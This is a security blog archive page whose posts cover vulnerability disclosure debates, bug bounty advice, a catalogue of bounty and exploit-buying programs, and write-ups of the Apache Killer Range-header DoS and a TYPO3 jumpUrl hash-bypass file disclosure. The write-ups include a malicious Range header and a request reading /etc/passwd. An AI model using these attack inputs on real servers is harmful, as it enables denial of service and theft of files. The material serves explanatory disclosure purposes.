+++ to secure your transactions use the Bitcoin Mixer Service +++

 

Showing posts with label disclosure. Show all posts
Showing posts with label disclosure. Show all posts

Vulnerability Disclosure: what could that new approach look like?

Few weeks ago, Enno Rey published an interesting reflection around vulnerability disclosure blog post discussing how the industry needs to adjust the “traditional” practices for disclosing software defects to vendors. If you haven't read the post, it’s highly recommended as it exemplifies a genuine experience from someone who has been dealing with vulnerabilities for over a decade.

At the end of the post, Enno is suggesting an open debate asking the community “What could that new approach look like?”
It’s just: what could that new approach look like?
Being a multi-author blog composed by security professionals with different backgrounds, interests and opinions, we decided to provide our input to this important discussion.

Luca Carettoni - @_ikki


If you believe in the vision of building a secure Internet, disclosing vulnerabilities to the vendor is evidently a strong requirement. Since the traditional model of reporting defects “for free” has demonstrated its limitations, it’s important that we build a sustainable ecosystem where security researchers can disclosure vulnerabilities, get a decorous compensation and ultimately hand over the bug to the vendor. Bug bounties and few vulnerability brokers that do not rely on the secrecy of the information (e.g. ZDI) are the incentive for disclosing to the vendor, while alleviating the pain of the process. We need to increase those opportunities by having more programs and higher rewards. Even without outbidding the black market, many researchers will prefer this approach for its ethical implications, resulting in a win-win situation.

If the vendor doesn't care (hey Mary!), digital self-defense in the form of full disclosure is a valid alternative, so that the community can work together on creating mitigations and resilient infrastructure in a timely manner. In these situations, Google's 90-day disclosure deadline is an example of a mechanism used to improve industry response times to security bugs.

Michele Orrù - @antisnatchor


Freedom is the key. I’m tired of regulations and compliance to rules imposed by people who are not even in the security industry.  If I find a bug, I want to have the freedom to do whatever I want with it, for instance:  
  • Keep it private and use it during legit penetration tests or red team engagements, then report it to the vendor 12 months later because it’s Unholy Christmas time; 
  • Sell it just like a PoC, or sit on it to achieve full RCE and then sell it to some broker;  
  • Just go Full Disclosure and publish as a fake persona to cause mayhem;  
  • Privately report it to the vendor, helping them fixing it, etc. 

Let's say I find a bug in a (defensive) security product. I would never report it to the vendor unless they pay a (very) good amount of money. There are tons of security product vendors who make millions of dollars selling crap that works so-so and most of the time can be owned remotely, effectively becoming a pivot point in the customer’s network. Why should I help them for free to make even more money silently patching bugs in their systems?

Moreover, the annoying stories of people saying “hey, if you release that 0day, the black market will use it!”, or “hey, isn’t that open source hacking tool very dangerous if used by the wrong people?” can be demystified very easily. In my opinion governments use the black market as a resource, if they really need to, like the Italian government uses Mafia(s) to get intel/help in certain circumstances. Moreover, about open source hacking tools (same as vulnerabilities) being dangerous: how they are used is the key here. In fact I see a certain analogy between OSS hacking tools and 0days. If someone use an OSS hacking tool to own a financial institution and he gets caught, would you blame the developers of the tool or the guy who did the hack? Same thing for a 0day, would you blame who found it, who used it, or the vendor? Would you blame Vitaly for discovering and selling the infamous Flash 0day, HackingTeam who weaponized it to “rule-them-all”, or Adobe for caring so little about security?

Truth is, education and knowledge are the keys. If we will be able to teach the new generation how to write secure code, how to do fuzzing during software development and testing and to never blindly trust input, then we would really increase Internet security. If we continue to go down through the path of ignorance and security by obscurity, chaos is nearer.

Luca De Fulgentis - @_daath


Said that full disclosure may not be that ethical in certain circumstances (remember Gobbles' apache-scalp?), I do neither truly believe in what is named “responsible” disclosure. Being “responsible” implies withstanding ethics that, in turn, implies naming things as “right” or “wrong”. Instead my own experience points me to think in term of what simply “works” rather than limiting choices – such as disclosing a bug – on the basis of a dualistic paradigm.

I never really understood the term “ethics”, especially if applied to the real-(security)world. We live in the dark ages of the Internet of Things where we are observing the rise of “ethical white knights”, which are building their fame and glory stealing someone else code or shitting on enemies (of the Internet, of course). While these useless characters only exist because of the “evil” the are trying to banish – and, hopefully, they will get of out scene now that the evil has been heavily hacked – what really makes me suffer is the term “ethical hacking”.

Ethical hacking’s deliverables are often intended as weapons to fuck up or deceive someone: technology or services providers, colleagues, managers and sometimes even customers. And let me say that out there most of the security firms and related professionals blindly accept this perverse “game”, even if they are claiming to be "ethical" or "white-something" - after all, business is business.

Back to the vulnerability disclosure debate, I’m not in the right position to properly identify a model that works, but let me say that it sounds like a NP-complete problem to be solved, and I think I’m not wrong when I’m saying that it can be compared to other well-know issues afflicting mankind.

So the whole topic could be shifted to a completely different level: we had, have and will always have insurmountable constraints, represented by subjects only interested in money, fame or power, that will always mark both the upper and lower bounds of "improvements" - name it, in example, a safer Internet via a robust vulnerability disclosure model. It's the same as the old plain physical world. It’s all the same, only the names will change.


Five Golden Rules For A Successful Bug Bounty Program

Bug bounty programs have become a popular complement to already existing security practices, like secure software development and security testing. In this space, there are successful examples with many bugs reported and copious rewards paid out. For vendors, users and researchers, this seems to be a mutually beneficial ecosystem.

True is that not all bug bounty initiatives have been so successful. In some cases, a great idea was poorly executed resulting in frustration and headache for both vendors and researchers.  Ineffective programs are mainly caused by security immaturity, as not all companies are ready and motivated enough to organize and maintain such initiatives.  Bug bounties are a great complement to other practices but cannot completely substitute professional penetration tests and source code analysis. Many organizations fail to understand that and jump on the bounties bandwagon without having mature security practices in place.

Talking with a bunch of friends during BlackHat/Defcon, we came up with a list of five golden rules to set your bug bounty program up for success. Although the list is not exhaustive, it was built by collecting opinions from numerous peers and should be a good representation of what security researchers expect.

If you are a vendor considering to start a similar initiative, please read it carefully.

The Five Golden Rules:

1. Build trust, with facts
Security testing is based on trust, between client and provider. Trust is important during testing, and especially crucial during disclosure time. As a vendor, make sure to provide as much clarity as you can. For duplicate bugs, increase your transparency by providing more details to the reporter (e.g. date/time of the initial disclosure, original bug ID, etc.). Also, fixing bugs and claiming that they are not relevant (thus non-eligible to rewards) is a perfect way to lose trust.

2. Fast turn around
Security researchers are happy to spend extra time on explaining bugs and providing workarounds, however they also expect to get notified (and rewarded) at the same reasonable speed. From reporting the bug to paying out rewards, you should have a fast turn around. Fast means days - not months. Even if you need more time to fix the bug, pay out immediately the reward and explain in detail the complexity of rolling out the patch. Decoupling internal development life cycles and bounties allows you to be flexible with external reporters while maintaining your standard company processes.

3. Get security experts
If you expect web security bugs, make sure to have web security experts around you. For memory corruption vulnerabilities, you need people able to understand root causes and to investigate application crashes. Either internally or through leveraging trusted parties, this aspect is crucial for your reputation. Many of us have experienced situations in which we had to explain basic vulnerabilities and how to replicate those issues. In several cases, the interlocutors were software engineers and not security folks: we simply talk different languages and use different tools.

4. Adequate rewards
Make sure that your monetary rewards are aligned with the market. What's adequate? Check Mozilla, Facebook, Google, Etsy and many others. If you don't have enough budget - just setup a wall of fame, send nice swags and be creative. For instance, you could decide to pay for specific classes of bugs or medium-high impact vulnerabilities only. Always paying at the low end of your rewards range, even for critical security bugs, it is just pathetic. Before starting, crunch some numbers by reviewing past penetration test reports performed by recognized consulting boutiques.

5. Non-eligible bugs
Clarify the scope of the program by providing concrete examples, eligible domains and types of bugs that are commonly rejected. Even so, you will have to reject submissions for a multitude of reasons: be as clear and transparent as possible. Spend a few minutes to explain the reason of rejection, especially when the researcher has over-estimated severity or not properly evaluated the issue.

Happy Bug Hunting, Happy Bug Squashing!

"No More Free Bugs" Initiatives

Two years after the launch of the "No More Free Bugs" philosophy, several companies and Open Source projects are now offering programs designed to encourage security research in their products. In addition, many private firms are publicly offering vulnerability acquisition programs.


This post is an attempt to catalog all public and active incentives. This includes traditional "Bug Bounty Programs" as well as "Vulnerability/Exploit Acquisition Programs".
Update (19 Oct 2013): A new website http://www.bugsheet.com/bug-bounties has started collecting bug bounties and disclosure programs. I do recognize that an actual website is better than a single blog post, thus I've discontinued this list.

Bug Bounty Programs


Sponsor

Target

Reward
AT&T Security vulnerabilities found within the AT&T API Platform $100-$5,000, plus merchandize (e.g. LTE data cards, phones with free service)
Avast Security vulnerabilities in the latest consumer Windows versions of Avast $200-$5,000
Barracuda Vulnerabilities in Barracuda appliances, including Spam/Virus Firewall, Web Filter, WAF, NG Firewall $500-$3,133.7
BugCrowd Crowdsourced security testing. BugCrowd manages bug bounty programs for third-party companies Starting from $250
BugWolf Marketplace for bug bounty hunters. BugWolf manages bug bounty programs for third-party companies Starting from $500
Coinbase Previously unknown security vulnerabilities in Coinbase's web platform Starting from 5 BTC
Cryptocat XSS bugs, crypto implementation bugs, arbitrary code execution in Cryptocat's code $n/a
Djbdns Verifiable security holes in the latest version of Djbdns $1000
Etsy Web application vulnerabilities affecting the main www.etsy.com site, the etsy.com API, or the official Etsy mobile application Starting from $500
Facebook Facebook web platform security bugs. No third-party applications Starting from $500
Future of Enforcement Web vulnerabilities in Future of Enforcement's website €100
Gallery Security issues in the latest stable release of the popular web based photo album organizer $100-$1000
Google Chromium browser project, Chrome OS and selected Google web properties bugs $500-$20,000
IntegraXor HMI/SCADA Security vulnerabilities in IGX SCADA systems with verifiable proof-of-concepts Up to 8K I/O points (~$3999)
Hex-Rays Security bugs in the latest public release of Hex-Rays IDA Up to $3000
Kaneva High impact web application vulnerabilities $100
Mega Web application vulnerabilities and crypto bugs affecting MEGA's online systems Up to €10000
Meraki All web content under *.meraki.com, Meraki-operated web properties, systems manager client applications and Meraki hardware devices $100-$2500
Mozilla Firefox, Thunderbird and selected Mozilla Internet-facing websites bugs $500-$3000, plus Mozilla T-shirt
Nokia Vulnerabilities in all Nokia run services, applications and products excluding corporate infrastructure $n/a
PayPal Web application vulnerabilities in www.paypal.com $n/a
Piwik Flaws in Piwik web analytics software $200-$500
Qmail Verifiable security holes in the latest version of Qmail $5000
Ripple Security issues in Ripple, an OpenSource person to person payment network Up to $10000
Samsung Security bugs in Samsung TV/BD Starting from $500
Tarsnap Tarsnap bugs, affecting either pre-release or released versions $1-$2000
Yandex Security vulnerabilities in Yandex's services or mobile applications, as specified on the terms and conditions page $100-$1000

Vulnerability/Exploit Acquisition Programs


Sponsor

Target

Reward
BeyondSecurity SecuriTeam High and medium impact bugs in widely spread software $n/a
Coseinc Unpublished security vulnerabilities for Windows, Linux and Solaris $n/a
Exodus Intelligence Program Vulnerability research acquisition program for unknown vulnerabilities affecting widely deployed software packages $n/a plus yearly bonuses
ExploitHub Legitimate market-place for non-zero-day exploits $50-$1000. Both one-time purchase payments as well as recurring monthly payments from site-license customers
iSight Partners Bugs in typical corporate environment applications $n/a
Netragard 0-day exploits against well-known software $n/a
Packet Storm Exploits for 0-day and 1-day vulnerabilities in enterprise-grade software (Microsoft, Flash, Java, etc.) $1000-$7000
TippingPoint ZDI Undisclosed vulnerability research, affecting widely deployed software $n/a plus awards and benefits, depending on the contributor's status
VeriSign iDefence Security vulnerabilities in widely deployed applications $n/a
White Fir Design Bugs in WordPress code and plugins (with over 1 million downloads and compatible with the most recent WordPress) $50-$500

Contributions are welcome! If you are aware of an initiative not listed here or you want to report an inaccuracy in your initiative, please leave a comment and we will update this page over time. In fact, the more people, the better.

Just to clarify, we aim at indexing programs that are:
  • Legal. Although black/gray market places exist, we don't certainly want to list them here
  • Active. We want to keep track of ongoing initiatives. Even time-limited programs are eligible, as long as they are still accepting submissions
  • Public. All entries must have publicly available details. This may range from accurate guidelines and rules to just a simple sentence stating the nature of the incentive. It hence follows that we are going to report public information only. In case of cash rewards, the actual amount is reported whenever the min-max price paid is clearly stated
  • Reward-based. In most cases, entries are "cash-for-bugs" programs. However, any kind of tangible reward is eligible. "No More Free Bugs" versus "No More Cheap Bugs" disputes are not considered here
Disclaimer: we do not endorse, represent or warrant the accuracy or reliability of any of these programs.

    On exploits and assessing security

    Everything started on a summer Friday, August 19 2011, 23:23 BST (so it might be reported to Sat 20 Aug, depending on your timezone).
    Kingcope, a Greek hacker known for a long stream of 0days and trash Greek music soundtracks, posts a very short email on the Full-Disclosure mailing list. The email has a promising title, Apache Killer, and an attachment: killapache.pl.

    The script is extremely simple: 84 lines of perl, comments included, capable of killing any Apache web server.

    The core of the attack is extremely simple: the script sends a (perfectly legit) request to the Apache server, including a Range header similar to this:

    Range: bytes=0-,5-0,5-1,5-2,5-3,5-4,5-5,5-6,5-7,5-8,5-9,5-10,5-11,5-12,5-13,5-14,5-15,5-16,5-17,5-18,5-19, 5-20,5-21,5-22,5-23,5-24,5-25,5-26,5-27,5-28,5-29, -[..and many many more..].

    What happens behind the scene is that Apache has to make separate copies of the response for each of those ranges and, guess what, it explodes.

    The Range header (defined here in RFC 2616) has legitimate uses: for instance, PDF readers use it while you scroll down the page. Let us reiterate that the attack is a perfectly well formed request: "A byte range operation MAY specify a single range of bytes, or a set of ranges within a single entity."
    On a side note, IIS only allows up to 5 ranges for each HTTP request, and it is not vulnerable - with the notable exception of IIS 5, but you don't have those around anymore, do you?

    But back to our story. Apache reacted "quickly", issuing a security advisory [CVE-2011-3192] a mere 4 days after the release, on August 24 16:16 GMT [http://article.gmane.org/gmane.comp.apache.announce/58]. They acknowledged the bug, promising that "A full fix is expected in the next 48 hours.". Apache also provided a number of different mitigations, by using mod_rewrite, limiting the size of the request field or even a dedicated module.

    +1 for having included so many mitigations inside the advisory, -1 for taking so long to give an official answer.

    A number of different answers were surfacing by that time, including Spiderlab's suggestion of using ModSecurity (but truth be told the answer was already floating on some forums). The 24th was, in short, the moment where the general public started noticing the issue - also thanks to a The Register's article which, even though it drops a totally out of place comment on open source security, at least cites Zalewski.

    And this is the interesting bit of the story: the bug was well known!
    lcamtuf reported this exact issue in 2007 - just 4 years ago.

    The reactions were, to say the least, wrong. William A. Rowe [of the Apache Software Foundation] answered: "With the host of real issues out there in terms of massively parallel DDoS infrastructures that abound, this is, as you say, quite a silly report.". Yeah, sure. The issue was also thought to be connected to the sliding window (Rowe: On the matter of your 1GB window (which is, again, the real issue), you have any examples of a kernel that permits that large a sliding window buffer by default).
    Probably even lcamtuf did not understand the full impact of this issue - we are speaking about a full DOS against the default installation after all, even if it is very easily avoided - as he says: "William, again, this is not a critical issue; I did mention that, and if it were, I wouldn't report it that way". The issue was thus not really understood by both parties, or at least its full implications were not. If we go into the details of the bug report we must grant the fact that it focused more on the "network" attack vector - not exactly the one exploited by Kingcope's attack, which results in memory exhaustion. Siim Põder also tried to implement the attack, but failed. The thread then just died.

    Bottom line: general failure of the community to identify and evaluate a risk in the absence of an exploit. So long for all the "risk assessment without full disclosure" talks: without an exploit, an entire community looking at the description of a bug in the most widespread web server of the world failed to evaluate risk.

    At the same time, in the Apache dev@ mailing list there was not a single mention of the bug. Compare that to the mail thread [mod_deflate & range requests) from last August: http://mail-archives.apache.org/mod_mbox/httpd-dev/201108.mbox/browser, or here. This exploit, in the end, resulted in a ticket on the ietf with a request for changing the standards [http://trac.tools.ietf.org/wg/httpbis/trac/ticket/311]: that's what we call impact.

    And all because an exploit was not developed in the first place...

    TYPO3-SA-2010-020, TYPO3-SA-2010-022 explained

    On 16th December, TYP03 released a new security update (TYPO3-SA-2010-022) for their content management system. Apparently, this web-based framework is widely used in many important websites.
    Within this update, TYPO3 team fixed a vulnerability that I've discovered a few weeks ago. In detail, this discovery pertains to a previous vulnerability fixed in TYPO3-SA-2010-020 and discovered by Gregor Kopf.

    TYP03 decided to follow a policy of least disclosure. Although it's an Open Source project, no technical details are available in the wild besides these (1,2). As I strongly believe that this practice does not improve the overall security (as mentioned in a previous post), I've decided to briefly explain this interesting flaw.

    From the advisory, we can actually deduce two important concepts:

    A Remote File Disclosure vulnerability in the jumpUrl mechanism [..] Because of a non-typesafe comparison between the submitted and the calculated hash, it is possible [..]
    In a nutshell, the JumpUrl mechanism allows to track access on web pages and provided files (e.g. /index.php?id=2&type=0&jumpurl=/etc/passwd&juSecure=1&locationData=2%3a&juHash=2b1928bfab)

    The patch (see this shell script) simply replaces the two equal signs with three (loose vs strict comparisons).

    That's the affected code:


    Having this knowledge, it is probably clear to the reader that the overall goal is to bypass the comparison between $juHash and $calcJuHash. While the former is user supplied (string or array), the latter is derived from a substr(md5_value,10) (string).

    In PHP, comparisons involving numerical strings result in unexpected behaviors (at least for me before studying this chapter).
    If you compare a number with a string or the comparison involves numerical strings, then each string is converted to a number and the comparison performed numerically
    If the string does not contain any of the characters '.', 'e', or 'E' and the numeric value fits into integer type limits (as defined by PHP_INT_MAX), the string will be evaluated as an integer. In all other cases it will be evaluated as a float.
    For instance, the following comparisons are always TRUE:
    if(0=="php")-> TRUE
    if(12=="12php")-> TRUE
    if(110=="110")-> TRUE
    if(100=="10E1")-> TRUE
    if(array()==NULL) -> TRUE
    [..]
    And again, also the following comparisons are TRUE:
    If("0"=="0E19280311"){}
    If("0"=="0E00106552"){}
    If("0"=="0E81046233"){}
    Consequently, we can pad and wait till the substring of an md5 hash resembles this form. If you do the math, you will discover that the combined probability of having such calculated hash is considerably less than pure bruteforcing.
    ~37037037 max trials (worth case) VS 3656158440062976 all possibilities
    In practice, the number of iterations is even less as "0000E13131" and similar strings are also accepted.

    To further improve this attack, I've discovered another bypass (TYPO3-SA-2010-022) which allows the disclosure of TYPO3_CONF_VARS['SYS']['encryptionKey']. In this way, it is possible to retrieve the key once and download multiple files without repeating the entire process. Using multiple requests, this attack takes a few minutes (8-20 minutes in a local network). A real coder can surely enhance it.

    As you can see from the exploit (posted on The Exploit Database), the fileDenyPattern mechanism bypass is pretty trivial. A demonstration video is also available here (slow connection, sorry).

    Keep your TYPO3 installation updated! A patch is already available from the vendor's site.

    @_ikki

    Unspecified vulnerabilities

    If you're a pentester, it's probably not news to you that "least disclosure" policies for disclosing vulnerabilities are fruitless. Unfortunately, they are even counterproductive for the entire security ecosystem and I will try to convince you within this post.

    Before going any further, let's explain what "least disclosure" actually means.
    In a nutshell, least disclosure is about providing the least necessary facts of vulnerabilities that are needed to know if a user might be affected and what the possible impact would be. No technical details, no exploits, no proof-of-concept code.

    As mentioned here, you may argue that it increases the overall security as a random "black hat needs to put some efforts in thinking and coding before he's able to exploit a vulnerability".

    However, we all claim that "security through obscurity" is bad:

    • Aggressors don't have time constraints. They can analyze patches, read all documentation and spend nights on a single flaw

    • No technical details in the wild generally means no signatures and detectors in security tools

    • "Least Disclosure" tends to degenerate in "Unspecified Vulnerability in Unspecified Components". Please fix your computer and don't ask why
    Although we cannot certainly force vendors' disclosure policies, sharing the outcome of any security research may be beneficial at the end of the day.

    Thoughtful reader, please note that getting profit from vulnerabilities does not necessary implicate concealing details. For instance, see the Mozilla Security Bounty Program FAQ.
    We're rewarding you for finding a bug, not trying to buy your silence
    If you enjoy the spirit, you may appreciate the following posts. Welcome back NibbleSec readers!

    @_ikki